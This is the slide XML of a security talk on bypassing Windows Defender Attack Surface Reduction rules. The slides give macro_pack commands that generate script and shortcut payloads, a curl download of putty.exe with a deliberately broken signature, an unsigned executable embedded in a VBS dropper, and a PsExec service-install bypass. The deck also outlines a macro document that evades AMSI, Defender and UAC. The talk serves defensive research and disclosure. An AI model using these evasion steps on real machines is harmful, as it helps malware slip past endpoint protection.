              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do not trigger the rule.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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>broken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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.darkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>. </a:t>
            </a:r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91204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Block untrusted and unsigned processes that run from USB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2EFE2-4F99-4EC8-88EF-4EA9D45E3543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1900238"/>
            <a:ext cx="10629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b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Trigger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lvl="1"/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not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTA payload (e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>cho calc.exe | macro_pack.py -t CMD -G G:\test.hta) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>VBS payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>echo calc.exe | macro_pack.py -t CMD -G G:\test.vbs) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>LNK payload (echo calc.exe . | macro_pack.py -G G:\test.lnk)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows binary PE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>copy /b %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>windir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>%\system32\calc.exe G:\test.exe) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Non Microsoft binary (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>curl https://.../putty.exe --output G:\putty.exe)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27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Trigger rule!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Non-signed binary:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>curl https://.../putty.exe --output G:\putty_badsignature.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>echo 0 &gt;&gt; G:\ putty_badsignature.exe   # Break signature </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASR rule triggered!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Bypass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Work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>executables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> workaround:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mbed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> unsigned executable in a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>macro_pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -t EMBED_EXE -e G:\putty_badsignature.exe -G drop_bad_putty.vbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with nice potential but current implementation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disapointing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7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process creations originating from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and WMI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3E1F6-D118-4840-99EF-598CCDC93DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040783" y="1834634"/>
            <a:ext cx="6452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d1e49aac-8f56-4280-b9ba-993a6d77406c  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3601821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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PsExec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psexec.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; Not blocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -s -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; blocked (PSEXESVC service blocked?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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6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Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PsExec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Local bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>PSEXESVC.exe –install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>PsInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> Service installed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> start PSINFSVC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -s -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; Bypass!!!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48D53-E173-4200-B3E8-FAAD6651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70" y="3684741"/>
            <a:ext cx="8086859" cy="26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C60D-0CC7-4341-B57D-3C006EDA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A63A-396C-4AED-98FA-C196CAD3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Defender Enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AMSI enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASR rules enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heavy usage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SysInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>macro_pack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rule, lets find out how it works and bypass it!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hope you like VBScript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 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2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Bypass All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A52E-945B-4745-8525-A521F520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Malicious PowerPoint with macro which:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is obfuscated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypasses ASR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypasses AMSI &amp; Windows Defender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypasses UAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download and Drop putty and run it with elevated privileges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0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extract 1 (execute command)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0A50FC-4234-422F-A751-6078BC45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10" y="2027464"/>
            <a:ext cx="5515461" cy="35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3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D82-99FB-4FB8-8548-E7E747D9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extract 2 (Bypass UAC)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926EDB-D45E-40A8-AF93-F3184CFB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08097"/>
            <a:ext cx="8382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2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E3C8-6572-4AF9-BCD1-B692B496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Tadaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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85BD0-B69E-488F-A341-7CEBA951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70144" cy="12561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B5ED55-D18C-444C-BB46-27A9B2B0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Samples will be available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Maybe…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I would hate to help ransomware writers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also Microsoft please don’t close my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account?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4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23C4-8567-4230-97B7-F82D479B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taughts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A5096A-3630-45D9-A17D-33C5BA93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Some rules could prevent all common malware attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy bypass and broken rules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well known by blue teams (Windows Defender required)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vastly deployed its probable that malware author will quickly adapt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97C31-4A83-45F3-9D98-82582C9D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514" y="681037"/>
            <a:ext cx="232228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38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E3C8-6572-4AF9-BCD1-B692B496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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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CBFF-CE84-434F-B315-AC676E7E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dont have time…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>DM @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>EmericNasi</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>emeric.nasi@sevagas.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Paper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> more information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!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1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Block child process creation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8DD8E-C65E-4564-8754-262C7BE4D953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943100" y="1690688"/>
            <a:ext cx="106299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D4F940AB-401B-4EFC-AADC-AD5F3C50688A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26190899-1602-49e8-8b27-eb1d0a1ce869 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d1e49aac-8f56-4280-b9ba-993a6d77406c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r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AB66-7F55-49C5-BEA2-019B628D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Block child process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BC64-7A13-4330-8A15-79E4FDC3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efficient rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Several rules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Office applications (ex Excel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Office communication (ex Outlook)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For WMI and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec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Others (ex Adobe)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Bypass these rules allows to bypass others </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77948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AF4-3C16-42B3-A62E-FBB04848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000"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used in various VBA droppers &amp; malwares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Blocked by ASR (same as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>ShellExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, DDE, etc.)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C936A875-E045-4FA4-9DAC-81D87FD49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71014"/>
            <a:ext cx="7687730" cy="11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494B-28CC-4AD0-B6EF-277E53D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bypass?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DE7D9-9DC9-4347-BADC-BA1CECA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8961"/>
            <a:ext cx="10515600" cy="4338002"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Important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: « Child process »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> a command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child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> process?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Multiple solutions!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ECF-2501-4E50-92A5-14C82D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bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> WMI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EAF4-3C16-42B3-A62E-FBB04848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3000"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bypass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en-US" dirty="0"/>
              <a:t>D4F940AB-401B-4EFC-AADC-AD5F3C50688A </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Blocked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> by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en-US" dirty="0"/>
              <a:t>d1e49aac-8f56-4280-b9ba-993a6d77406c </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4385B987-FE14-4FE6-A45D-63A789A861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079"/>
            <a:ext cx="8879653" cy="19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1229</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>222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Bypass Windows Defender Attack Surface Reduction</vt:lpstr>
      <vt:lpstr>Who am I?</vt:lpstr>
      <vt:lpstr>Attack Surface Reduction</vt:lpstr>
      <vt:lpstr>Context</vt:lpstr>
      <vt:lpstr>Block child process creation</vt:lpstr>
      <vt:lpstr>Block child process creation</vt:lpstr>
      <vt:lpstr>Typical example</vt:lpstr>
      <vt:lpstr>How to bypass?</vt:lpstr>
      <vt:lpstr>Partial bypass using WMI</vt:lpstr>
      <vt:lpstr>Partial bypass via Outlook</vt:lpstr>
      <vt:lpstr>Using task scheduler</vt:lpstr>
      <vt:lpstr>Using existing COM objects</vt:lpstr>
      <vt:lpstr>ShellWindows COM object</vt:lpstr>
      <vt:lpstr>Using custom COM object</vt:lpstr>
      <vt:lpstr>Block Office applications from creating executable content </vt:lpstr>
      <vt:lpstr>Trigger  rule</vt:lpstr>
      <vt:lpstr>Bypass rule</vt:lpstr>
      <vt:lpstr>Block Win32 API calls from Office macro</vt:lpstr>
      <vt:lpstr>Some tests</vt:lpstr>
      <vt:lpstr>Trigger rule</vt:lpstr>
      <vt:lpstr>Bypass rule</vt:lpstr>
      <vt:lpstr>Block Office app process injection</vt:lpstr>
      <vt:lpstr>Trigger rule</vt:lpstr>
      <vt:lpstr>Bypass rule</vt:lpstr>
      <vt:lpstr>Block JavaScript or VBScript from launching downloaded executable content</vt:lpstr>
      <vt:lpstr>Trigger rule?</vt:lpstr>
      <vt:lpstr>Quick AMSI bypass tip </vt:lpstr>
      <vt:lpstr>Trigger rule!</vt:lpstr>
      <vt:lpstr>Bypass rule</vt:lpstr>
      <vt:lpstr>Block execution of potentially obfuscated scripts</vt:lpstr>
      <vt:lpstr>Trigger rule?</vt:lpstr>
      <vt:lpstr>Trigger rule </vt:lpstr>
      <vt:lpstr>Block untrusted and unsigned processes that run from USB</vt:lpstr>
      <vt:lpstr>Trigger rule?</vt:lpstr>
      <vt:lpstr>Trigger rule!</vt:lpstr>
      <vt:lpstr>Bypass rule</vt:lpstr>
      <vt:lpstr>Block process creations originating from PSExec and WMI commands</vt:lpstr>
      <vt:lpstr>Trigger PsExec Rule</vt:lpstr>
      <vt:lpstr>Bypass PsExec Rule</vt:lpstr>
      <vt:lpstr>Bypass All Scenario</vt:lpstr>
      <vt:lpstr>Code extract 1 (execute command)</vt:lpstr>
      <vt:lpstr>Code extract 2 (Bypass UAC)</vt:lpstr>
      <vt:lpstr>Tadaaa!</vt:lpstr>
      <vt:lpstr>Other taughts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Windows Defender Attack Surface Reduction</dc:title>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-26T09:45:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-16T08:53:44Z</dcterms:modified>
</cp:coreProperties>
</file>